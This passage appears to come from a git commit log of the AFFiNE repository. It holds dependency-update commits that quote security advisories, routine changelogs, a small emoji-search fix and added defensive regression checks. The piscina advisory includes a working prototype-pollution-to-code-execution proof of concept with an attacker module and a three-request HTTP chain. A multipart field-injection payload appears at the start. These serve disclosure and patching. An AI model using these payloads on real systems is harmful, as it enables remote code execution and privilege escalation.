`user=alice%0D%0A--BB%0D%0AContent-Disposition:%20form-data;%20name="role"%0D%0A%0D%0Aadmin%0D%0A--BB--`

##### Remediation
Neutralize CR/LF (and `"`) in keys/values before interpolation, or build
the body with a real multipart encoder (e.g. `FormData` / `form-data`)
instead of string concatenation. Minimal fix:

```js
function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  const bad = /[\r\n]/;
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    const v = String(value);
    if (bad.test(key) || bad.test(v)) {
      throw new Error('fixRequestBody: CR/LF not allowed in multipart field name/value');
    }
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key.replace(/"/g, '%22')}"\r\n\r\n${v}\r\n`;
  }
  return str; // hand the rebuilt body back to the caller
}
```
(Reject is preferable to silent stripping, to avoid masking malicious
input.)

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N`

#### References
- [https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm)
- [https://github.com/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>chimurai/http-proxy-middleware
(http-proxy-middleware)</summary>

### [`v3.0.7`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.7)

[Compare
Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7)

#### What's Changed

- fix(fixRequestBody): harden form-data stringification by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1259](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1259)
- chore(package.json): v3.0.7 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1261](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1261)

**Full Changelog**:
<https://github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7>

### [`v3.0.6`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.6)

[Compare
Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6)

#### What's Changed

- fix(types): fix Logger type by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1104](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1104)
- fix(fixRequestBody): support text/plain by
[@&#8203;knudtty](https://redirect.github.com/knudtty) in
[#&#8203;1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103)
- chore(examples): bump deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1105](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1105)
- build(prettier): improve prettier setup by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1108](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1108)
- chore(deps): fix punycode node deprecation warning by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1109](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1109)
- chore(examples): bump deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1110](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1110)
- build(codespaces): add devcontainer.json by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1112](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1112)
- chore(package): bump dev dependencies by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1116](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1116)
- ci(github-action): ci.yml add node v24 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1117](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1117)
- chore(package): bump dev dependencies by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1118](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1118)
- chore(package): upgrade to jest v30 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1122](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1122)
- chore(examples): upgrade deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1124](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1124)
- chore(package): update dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1125](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1125)
- test(websocket): fix ws import by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1126](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1126)
- chore(refactor): use `node:` protocol imports by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1127](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1127)
- ci(node24): pin node24 due to TLS issue with mockttp by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1137](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1137)
- docs(recipes/pathRewrite.md): fix comment by
[@&#8203;DEBargha2004](https://redirect.github.com/DEBargha2004) in
[#&#8203;1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135)
- chore(package): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1138](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1138)
- chore(deps): update actions/checkout action to v5 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1140](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1140)
- fix(error-response-plugin): sanitize input by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1141](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1141)
- chore(package.json): update dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1143](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1143)
- chore: add context7.json by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1144](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1144)
- build(eslint): update eslint.config.mjs by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1145](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1145)
- ci(github workflow): harden github workflows by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1146](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1146)
- chore(package): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1147](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1147)
- ci(ci.yml): unpin node 24 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1148](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1148)
- docs(recipes): fix servers.md http.createServer example by
[@&#8203;hacklschorsch](https://redirect.github.com/hacklschorsch) in
[#&#8203;1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150)
- ci: publish with oidc by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1152](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1152)
- chore(package.json): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1153](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1153)
- chore(package.json): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1155](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1155)
- chore(package.json): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1158](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1158)
- test(types.spec.ts): add type check when req or res are 'any' by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1161](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1161)
- chore(package.json): bump deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1164](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1164)
- chore(package.json): eslint v10 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1165](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1165)
- chore(package.json): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1166](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1166)
- chore(package.json): bump dev-deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1171](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1171)
- docs(examples): fix websocket example by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1170](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1170)
- build(vscode): use workspace version of TypeScript by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1173](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1173)
- fix(router): harden proxy-table matching by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1254](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1254)
- chore(package.json): v3.0.6 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1256](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1256)

#### New Contributors

- [@&#8203;knudtty](https://redirect.github.com/knudtty) made their
first contribution in
[#&#8203;1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103)
- [@&#8203;DEBargha2004](https://redirect.github.com/DEBargha2004) made
their first contribution in
[#&#8203;1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135)
- [@&#8203;hacklschorsch](https://redirect.github.com/hacklschorsch)
made their first contribution in
[#&#8203;1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150)

**Full Changelog**:
<https://github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-19 12:18:31 +08:00
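Added example (not part of the commit message above or of http-proxy-middleware's code): a regression check for the multipart field injection described in the GHSA-gcq2-9pq2-cxqm advisory quoted in that commit. `encodeNaive`, `encodeStrict`, `partNames` and `extraParts` are hypothetical names, the input is the constructed value from the advisory's PoC, and the closing delimiter both encoders append is an assumption of this example.

```javascript
const CRLF = '\r\n';

// Unescaped string concatenation, the shape the advisory describes as vulnerable.
function encodeNaive(boundary, data) {
  let out = '';
  for (const [key, value] of Object.entries(data)) {
    out += `--${boundary}${CRLF}Content-Disposition: form-data; name="${key}"${CRLF}${CRLF}${value}${CRLF}`;
  }
  return out + `--${boundary}--${CRLF}`; // closing delimiter (assumption of this example)
}

// Hardened encoder: reject CR/LF in names and values, percent-encode quotes in names.
function encodeStrict(boundary, data) {
  const bad = /[\r\n]/;
  let out = '';
  for (const [key, value] of Object.entries(data)) {
    const v = String(value);
    if (bad.test(key) || bad.test(v)) {
      throw new Error('CR/LF not allowed in multipart field name/value');
    }
    const name = key.replace(/"/g, '%22');
    out += `--${boundary}${CRLF}Content-Disposition: form-data; name="${name}"${CRLF}${CRLF}${v}${CRLF}`;
  }
  return out + `--${boundary}--${CRLF}`;
}

// Minimal multipart reader: part names in the order a backend parser would see them.
function partNames(boundary, body) {
  const names = [];
  const segments = (CRLF + body).split(`${CRLF}--${boundary}`);
  for (const seg of segments.slice(1)) {        // segments[0] is the preamble
    if (seg.startsWith('--')) break;            // closing delimiter reached
    const headEnd = seg.indexOf(CRLF + CRLF);
    if (headEnd === -1) continue;               // malformed part: no header terminator
    const m = /;\s*name="([^"]*)"/.exec(seg.slice(0, headEnd));
    if (m) names.push(m[1]);
  }
  return names;
}

// Part names the backend would see that the gateway never saw as req.body keys.
function extraParts(encode, boundary, data) {
  const seen = new Set(Object.keys(data));
  return partNames(boundary, encode(boundary, data)).filter((n) => !seen.has(n));
}

// Constructed inputs: the single-field body from the advisory's PoC, and a benign body.
const pocBody = {
  user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--',
};
const benignBody = { user: 'alice', note: 'two words' };

console.log('naive, PoC body   ->', extraParts(encodeNaive, 'BB', pocBody));
console.log('strict, benign    ->', partNames('BB', encodeStrict('BB', benignBody)));
try {
  encodeStrict('BB', pocBody);
} catch (e) {
  console.log('strict, PoC body  ->', e.message);
}
```

A non-empty result from `extraParts` means the gateway's view of `req.body` and the backend's view of the forwarded body disagree, which is the condition the advisory's gateway-side checks cannot see.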
renovate[bot] 9a9f243966 chore: bump up piscina version to v5.2.0 [SECURITY] (#15132)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [piscina](https://redirect.github.com/piscinajs/piscina) | [`5.1.4` → `5.2.0`](https://renovatebot.com/diffs/npm/piscina/5.1.4/5.2.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/piscina/5.2.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/piscina/5.1.4/5.2.0?slim=true) |

---

### piscina: Prototype Pollution Gadget → RCE via inherited options.filename
[CVE-2026-55388](https://nvd.nist.gov/vuln/detail/CVE-2026-55388) /
[GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg)

<details>
<summary>More information</summary>

#### Details
##### Summary

`piscina`'s constructor and `run()` paths read the `filename` option via
plain member access:

```js
// dist/index.js line 92 (constructor)
const filename = options.filename
  ? (0, common_1.maybeFileURLToPath)(options.filename)
  : null;
this.options = { ...kDefaultOptions, ...options, filename, maxQueue: 0 };

// dist/index.js line 616 (run())
run(task, options = kDefaultRunOptions) {
    if (options === null || typeof options !== 'object') {
        return Promise.reject(new TypeError('options must be an object'));
    }
    const { transferList, filename, name, signal } = options;
```

Both reads fall through the prototype chain when the caller's options
object doesn't have `filename` as an own property. When
`Object.prototype.filename` is polluted upstream — by any of the
well-documented PP-source CVEs (lodash<4.17.13, qs<6.10.3,
set-value<4.1.0, minimist<1.2.6, deepmerge<4.2.2, and others) — the
inherited value flows to `worker_threads.Worker` import and the
attacker's `.mjs` runs in the worker.

**Subtlety**: calling `pool.run(task)` with no second arg uses
`kDefaultRunOptions` which has `filename: null` as an OWN property —
that path DOES NOT fire. The vulnerable shape is when the caller passes
their own options object (commonly `{signal: ac.signal}` for abort
support, `{name: ...}` for task labelling, etc.). These caller-built
options objects inherit from `Object.prototype` unless the caller
explicitly uses `Object.create(null)`.

##### Impact

Two preconditions:

1. **Upstream PP-source** somewhere in the process — common in
transitive deps
2. **Attacker-controllable `.mjs`** at a known filesystem path —
realistic via upload endpoints, /tmp races, predictable node_modules
paths, or supply-chain

Once both fire:
- Every `pool.run(task, opts)` call across the entire process is
hijacked
- Attacker's exported function is called with the legitimate caller's
task data — **attacker reads per-request app data**
- Attacker controls the return value — caller receives
`worker_response.by = "ATTACKER-WORKER"` and any other attacker-supplied
response fields — **attacker can poison return values to legitimate
clients**
- Hijack persists until process restart

Strictly worse than the analogous pino chain because piscina actually
*invokes* the attacker function with caller data on every dispatch (pino
imports the attacker module once and errors out).

##### Affected versions

Empirically verified vulnerable on `piscina@5.1.4` (latest stable at
time of disclosure). The bug shape is in the constructor's
`options.filename` read at line 92 of `dist/index.js`, present since the
worker-pool API stabilized — likely all 3.x / 4.x / 5.x affected.

##### Proof of concept

##### A) Minimal in-process PoC

```js
import fs from 'fs';

// 1) Drop the attacker module (any path the victim process can read)
fs.writeFileSync('/tmp/atk.mjs', `
  import fs from 'fs';
  fs.writeFileSync('/tmp/PISCINA_RCE_SENTINEL', JSON.stringify({
    rce: 'CONFIRMED', pid: process.pid, argv1: process.argv[1],
  }));
  export default function(arg) { return 'attacker-return-' + JSON.stringify(arg); }
`);

// 2) Upstream PP-source — pollute Object.prototype.filename
//    (representative of CVE-2019-10744 lodash<4.17.13, CVE-2022-24999 qs<6.10.3,
//     and ~30 historical PP-source CVEs)
const payload = JSON.parse('{"__proto__":{"filename":"/tmp/atk.mjs"}}');
function vulnMerge(t, s) {
  for (const k of Object.keys(s)) {
    if (s[k] !== null && typeof s[k] === 'object') {
      if (!t[k]) t[k] = {};
      vulnMerge(t[k], s[k]);
    } else t[k] = s[k];
  }
}
vulnMerge({}, payload);

// 3) Piscina with empty options inherits the polluted filename
const { Piscina } = await import('piscina');
const p = new Piscina({});                        // inherits filename
const result = await p.run({});                   // worker imports /tmp/atk.mjs
await p.destroy();

// 4) sentinel exists; attacker fn was called with task data
console.log(fs.readFileSync('/tmp/PISCINA_RCE_SENTINEL', 'utf8'));
console.log('attacker fn returned:', result);
// → "attacker-return-{}"
```

##### B) Full-stack HTTP chain (this is the realistic shape)

A correctly-initialized pool gets hijacked by attacker activity. Pool is
created at server boot with a legitimate worker, then per-request
handlers call `pool.run(req.body, {signal: ac.signal})` — the standard
abort-aware shape.

```js
// === server.mjs ===
import express from 'express';
import { Piscina } from 'piscina';

// Vulnerable PP-source middleware (lodash<4.17.13 equivalent)
function vulnMerge(t, s) {
  for (const k of Object.keys(s)) {
    if (s[k] !== null && typeof s[k] === 'object') {
      if (!t[k]) t[k] = {};
      vulnMerge(t[k], s[k]);
    } else t[k] = s[k];
  }
}

// CORRECT pool init at boot
const pool = new Piscina({
  filename: './valid-worker.mjs',
  minThreads: 1, maxThreads: 2,
});

const config = {};
const app = express();

app.post('/api/settings', express.json(), (req, res) => {
  vulnMerge(config, req.body);                    // PP source
  res.json({ ok: true });
});

app.post('/api/process', express.json(), async (req, res) => {
  const ac = new AbortController();
  const result = await pool.run(req.body, { signal: ac.signal });  // <-- hijacked
  res.json({ ok: true, worker_response: result });
});

app.listen(7755);

// === Attacker, 3 HTTP requests ===
// POST /upload  → drops /tmp/atk.mjs
// POST /api/settings with body: {"__proto__":{"filename":"/tmp/atk.mjs"}}
// POST /api/process → pool.run() destructures filename via prototype
//                  → worker imports /tmp/atk.mjs
//                  → attacker fn called with req.body of THIS request
//                  → caller receives attacker-shaped response
```

Empirical observation on `piscina@5.1.4` + Node 23.11.0:
- Pre-attack `/api/process` returns `{by: 'valid-worker'}`
- Cold-path `/probe` after PP source confirms `({}).filename` is
polluted process-wide
- Post-attack `/api/process` returns `{by: 'ATTACKER-WORKER', processed:
<caller's exfil data>}`
- Sentinel file written from inside `piscina/dist/worker.js` with the
worker process's uid + env access

##### Recommended fix

Minimal — own-property guard at both option-read sites:

```js
// constructor (line 92)
const userFilename = Object.prototype.hasOwnProperty.call(options, 'filename')
  ? options.filename
  : null;
const filename = userFilename
  ? (0, common_1.maybeFileURLToPath)(userFilename)
  : null;

// run() (line 616)
const safeOpts = Object.create(null);
Object.assign(safeOpts, options);          // copies own props only? — keeps shape
const { transferList, filename, name, signal } = safeOpts;
```

More idiomatic — use a null-prototype working object throughout
`this.options`:

```js
const safeOpts = Object.create(null);
Object.assign(safeOpts, kDefaultOptions, options);
this.options = safeOpts;
this.options.filename = safeOpts.filename
  ? (0, common_1.maybeFileURLToPath)(safeOpts.filename)
  : null;
this.options.maxQueue = 0;
```

Either approach closes the gadget without breaking any legitimate caller
pattern.

The pattern is the same as recommended for axios CVE-2026-44494 and the
pino PSA filed earlier today. Cross-fix consideration: any other library
you maintain that uses similar `options.X` member-access for worker /
child-process / module-load operations is worth a quick audit.

##### Coordination

- Same maintainer as pino — you're already in security-triage mode for
that PSA. Happy to coordinate timing / disclosure dates across both.
- Will not share publicly until GHSA published or 90 days.
- Please credit `ridingsa` if you choose to credit a reporter.

##### How this was discovered

Generalized the pino disclosure's mechanism — any library that reads a
string option via plain member access and dynamic-loads it (via
`import()` / `require()` / `new Worker()`) is a candidate. Ran a sweep
across 10 candidate libraries; piscina + fastify (via pino propagation)
fired. Piscina is independently vulnerable through its own option-read
sites, hence this separate disclosure.

#### Severity
- CVSS Score: 8.1 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`

#### References
- [https://github.com/piscinajs/piscina/security/advisories/GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/piscinajs/piscina/security/advisories/GHSA-x9g3-xrwr-cwfg)
- [https://github.com/advisories/GHSA-x9g3-xrwr-cwfg](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-x9g3-xrwr-cwfg)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>piscinajs/piscina (piscina)</summary>

### [`v5.2.0`](https://redirect.github.com/piscinajs/piscina/compare/v5.1.4...v5.2.0)

[Compare
Source](https://redirect.github.com/piscinajs/piscina/compare/v5.1.4...v5.2.0)

</details>

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-19 12:18:17 +08:00
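Added example (not part of the commit message above or of piscina's code): how the option-read shapes named in the GHSA-x9g3-xrwr-cwfg advisory resolve `filename` while `Object.prototype` carries an inherited value, together with a startup canary. All function names and the marker path are hypothetical, `kDefaultRunOptions` here is a stand-in for the library's default, and the pollution is simulated by a direct property definition that is removed afterwards.

```javascript
// Stand-in for the default run options the advisory describes: `filename` is an OWN property.
const kDefaultRunOptions = { transferList: [], filename: null, name: null, signal: null };

// Plain destructuring, as in the advisory's run() excerpt: falls through the prototype chain.
function readInherited(options = kDefaultRunOptions) {
  const { filename } = options;
  return filename ?? null;
}

// Own-property guard (the advisory's first recommended fix).
function readOwn(options = kDefaultRunOptions) {
  return Object.prototype.hasOwnProperty.call(options, 'filename') ? options.filename : null;
}

// Null-prototype working copy (the second recommended fix).
// Object.assign copies own enumerable properties only, so inherited keys are dropped.
function readViaNullProtoCopy(options = kDefaultRunOptions) {
  const safe = Object.assign(Object.create(null), options);
  return safe.filename ?? null;
}

// Health-check canary: a clean runtime has no enumerable keys on Object.prototype.
function pollutedKeys() {
  return Object.keys(Object.prototype);
}

// Run fn with Object.prototype.filename set to a constructed marker, then always restore.
function withSimulatedPollution(value, fn) {
  Object.defineProperty(Object.prototype, 'filename', {
    value, writable: true, enumerable: true, configurable: true,
  });
  try {
    return fn();
  } finally {
    delete Object.prototype.filename;
  }
}

function resolveAll() {
  const marker = '/constructed/placeholder.mjs'; // constructed value, not a real path
  return withSimulatedPollution(marker, () => {
    const callerOpts = { name: 'task-label' };   // caller-built literal, no own `filename`
    const nullProtoOpts = Object.assign(Object.create(null), { name: 'task-label' });
    return {
      canary: pollutedKeys(),
      inheritedLiteral: readInherited(callerOpts),       // resolves to the inherited marker
      inheritedDefault: readInherited(),                 // own `filename: null` shadows it
      inheritedNullProto: readInherited(nullProtoOpts),  // no prototype chain to fall through
      ownLiteral: readOwn(callerOpts),
      copyLiteral: readViaNullProtoCopy(callerOpts),
      explicit: readOwn({ filename: './valid-worker.mjs' }),
    };
  });
}

console.log(resolveAll());
console.log('clean after restore:', pollutedKeys().length === 0);
```

Running `pollutedKeys()` at startup and on a health-check endpoint gives an alertable signal for the upstream precondition, independent of whether each consumer has been patched.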
Tines Valen e2624d93c7 fix(core): filters emojipicker on label in addition to tags (#15129)
Fixes #15116 
# Issue
Emojipicker keyword filtering only filtered on `tags`, and not `label`.
So searching for an emoji's name would not result in said emoji ending
up in the result. E.g. searching "sunflower" does not make 🌻 appear.

# Solution
Adding an extra condition to the filter function to check if the keyword
is a substring of an emoji's label

# Result
Search results now include emojis with that `label`

## Summary by CodeRabbit

* **New Features**
* Improved emoji picker search to include matches on both emoji labels
and tags (case-insensitive), enabling broader search results for better
discoverability.
2026-06-18 22:07:27 +08:00
renovate[bot] 766219d4e1 chore: bump up nestjs to v11.1.27 (#15130)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.24/11.1.27) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.27?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.24/11.1.27?slim=true) |
| [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.24/11.1.27) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.27?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.24/11.1.27?slim=true) |
| [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.24/11.1.27) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.27?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.24/11.1.27?slim=true) |
| [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.24/11.1.27) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.27?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.24/11.1.27?slim=true) |
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.24` → `11.1.27`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.24/11.1.27) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.27?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.24/11.1.27?slim=true) |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the [Dependency
Dashboard](../issues/5188) for more information.

---

### Release Notes

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

### [`v11.1.27`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.27)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.26...v11.1.27)

#### What's Changed

- fix(core): sse async handlers teardown issue by
[@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in
[#&#8203;17131](https://redirect.github.com/nestjs/nest/pull/17131)
- fix(platform-fastify): forRoutes middleware ending slash by
[@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in
[#&#8203;17138](https://redirect.github.com/nestjs/nest/pull/17138)

**Full Changelog**:
<https://github.com/nestjs/nest/compare/v11.1.26...v11.1.27>

### [`v11.1.26`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.26)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.25...v11.1.26)

#### What's Changed

- fix(core): post sse endpoint empty response
[#&#8203;17098](https://redirect.github.com/nestjs/nest/issues/17098) by
[@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) in
[#&#8203;17099](https://redirect.github.com/nestjs/nest/pull/17099)

**Full Changelog**:
<https://github.com/nestjs/nest/compare/v11.1.25...v11.1.26>

### [`v11.1.25`](https://redirect.github.com/nestjs/nest/compare/v11.1.24...02f804159841a2771755c382832a7938b904c420)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.24...v11.1.25)

</details>

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-18 22:06:24 +08:00
renovate[bot] 01d7ef88e3 chore: bump up esbuild version to ^0.28.0 [SECURITY] (#15128)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [esbuild](https://redirect.github.com/evanw/esbuild) | [`^0.25.12` → `^0.28.0`](https://renovatebot.com/diffs/npm/esbuild/0.25.12/0.28.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/esbuild/0.28.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/esbuild/0.25.12/0.28.1?slim=true) |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the [Dependency
Dashboard](../issues/5188) for more information.

---

